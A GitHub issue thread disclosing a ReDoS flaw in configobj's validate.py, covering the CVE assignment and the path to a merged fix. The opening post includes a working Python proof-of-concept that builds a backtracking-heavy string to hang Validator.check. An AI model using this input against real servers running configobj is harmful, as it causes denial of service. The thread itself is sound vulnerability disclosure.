Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

A ReDoS vulnerability exists in ./src/configobj/validate.py #232

Closed
DarkTinia opened this issue Jan 27, 2023 · 10 comments
Closed

A ReDoS vulnerability exists in ./src/configobj/validate.py #232

DarkTinia opened this issue Jan 27, 2023 · 10 comments

Comments

@DarkTinia
Copy link

The affected code is located in validate.py-line660. It uses the vulnerable regular expression (.+?)\((.*)\). When the match fails, it will cause catastrophic backtracking.
I trigger the vulnerability using the python script below

from configobj.validate import Validator
value = "aaa"
i = 10
attack = '\x00'*16510*i + ')' + '('*16510*i
vtor = Validator()
newval1 = vtor.check(attack, value)

I see many projects referencing this file, when run server side there has possible DOS. It is my pleasure to provide a patch to repair the ReDoS vulnerability.

@robdennis
Copy link
Member

Opening a pull request that patches this vulnerability would be appreciated. Thank you.

@yewhen
Copy link

yewhen commented Apr 4, 2023

Is this security hole fixed?

@carnil
Copy link

carnil commented Apr 6, 2023

CVE-2023-26112 appears to have been assigned for this issue.

@swf504
Copy link

swf504 commented Apr 23, 2023

just ping, if any PR fixed this CVE?

@robdennis
Copy link
Member

robdennis commented Apr 23, 2023 via email

@cdcadman
Copy link
Contributor

Opening a pull request that patches this vulnerability would be appreciated. Thank you.

@robdennis I opened a PR, #236. Please let me know if you need me to change anything.

@ameka-trustwave
Copy link

Any update on this one? Thanks

@thebaptiste
Copy link

thebaptiste commented Aug 23, 2023

A new release including a fix (#236 ?) would be appreciated.

@azuterios
Copy link

Dear https://github.com/DiffSK Team, please push a new release, containing these changes. Thank you for the prompt support!

@jelmer
Copy link
Collaborator

jelmer commented Sep 17, 2024

#236 is now merged; I'm trying to work out how to do a release.

@jelmer jelmer closed this as completed Sep 17, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

10 participants